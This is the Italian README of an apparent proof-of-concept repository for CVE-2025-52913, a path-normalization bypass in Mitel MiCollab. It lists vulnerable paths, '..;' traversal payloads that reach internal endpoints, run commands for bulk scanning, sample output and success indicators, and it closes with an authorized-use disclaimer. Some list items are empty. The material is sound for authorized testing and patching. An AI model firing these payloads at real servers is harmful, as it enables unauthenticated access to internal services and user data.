
Una Proof of Concept (PoC) per CVE-2025-52913, una vulnerabilità di normalizzazione dei percorsi che interessa Mitel MiCollab.
Questo repository contiene una Proof of Concept (PoC) per CVE-2025-52913, una vulnerabilità di normalizzazione dei percorsi che interessa Mitel MiCollab.
Il problema consente ad attaccanti non autenticati di aggirare le restrizioni previste sui percorsi sfruttando sequenze URL appositamente costruite come ..;, portando all'accesso a endpoint applicativi interni.
Lo sfruttamento riuscito può consentire:
La vulnerabilità può essere innescata tramite i seguenti percorsi:
/npm-pwg/loginForm.jsp/
/npm-pwg/extendedUmPlayMessage.jsp/
/npm-admin/showLoginPage.do/
/npm-admin/login.do/
Esempi di payload di traversal:
/..;/..;/axis2-AWC/axis2-web/HappyAxis.jsp
/..;/..;/usp/searchUsers.do
pip install -r requirements.txt
python3 POC-CVE-2025-52913.py example.com
python3 POC-CVE-2025-52913.py domains.txt
[*] Testing http://example.com
[+] http://example.com/npm-pwg/loginForm.jsp/..;/..;/axis2-AWC/axis2-web/HappyAxis.jsp - 200
[!] Possible success
Un target è probabilmente vulnerabile se:
Il server risponde con HTTP 200
La risposta contiene:
Axis2Axis2 Happiness PageLa vulnerabilità deriva da una normalizzazione impropria dei percorsi costruiti contenenti ..;, che consente l'attraversamento oltre il contesto applicativo previsto.
Questo comportamento può esporre servizi interni come:
Scoperta da Dahmani Toumi
Questo progetto è destinato solo a scopi educativi e test di sicurezza autorizzati.
Non utilizzare questo strumento contro sistemi senza esplicita autorizzazione. L'autore non è responsabile per eventuali usi impropri o danni.